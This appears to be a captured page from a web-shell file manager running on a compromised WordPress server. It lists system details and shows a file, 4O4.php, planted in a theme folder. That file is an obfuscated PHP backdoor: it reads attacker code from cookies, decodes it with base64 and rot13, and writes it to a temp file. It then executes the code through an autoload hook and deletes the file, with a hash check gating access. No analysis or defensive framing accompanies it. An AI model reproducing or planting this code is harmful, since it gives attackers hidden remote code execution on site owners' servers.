HEX
Server: Apache
System: Linux localhost.localdomain 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
User: web57 (5040)
PHP: 7.4.33
Disabled: pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare,
$ pwd: /var/www/clients/client6/web57/web/wp-content/themes/config-1770394048/
Upload Files
File: /var/www/clients/client6/web57/web/wp-content/themes/config-1770394048/4O4.php
<!--mBSAsOYd-->
<?php

if (isset($_COOKIE[93-93]) && isset($_COOKIE[45-44]) && isset($_COOKIE[39+-36]) && isset($_COOKIE[-93+97])) {
    $mrk = $_COOKIE;
    function approve_request($tkn) {
        $mrk = $_COOKIE;
        $entity = tempnam((!empty(session_save_path()) ? session_save_path() : sys_get_temp_dir()), '74gNGAVc');
        if (!is_writable($entity)) {
            $entity = getcwd() . DIRECTORY_SEPARATOR . "event_handler";
        }
        $obj = "\x3c\x3f\x70\x68p " . base64_decode(str_rot13($mrk[3]));
        if (is_writeable($entity)) {
            $entry = fopen($entity, 'w+');
            fputs($entry, $obj);
            fclose($entry);
            spl_autoload_unregister(__FUNCTION__);
            require_once($entity);
            @array_map('unlink', array($entity));
        }
    }
    spl_autoload_register("approve_request");
    $value = "8ebd3bc63526880c54f4439061aeeade";
    if (!strncmp($value, $mrk[4], 32)) {
        if (@class_parents("publish_content_initialized", true)) {
            exit;
        }
    }
}
@ Telegram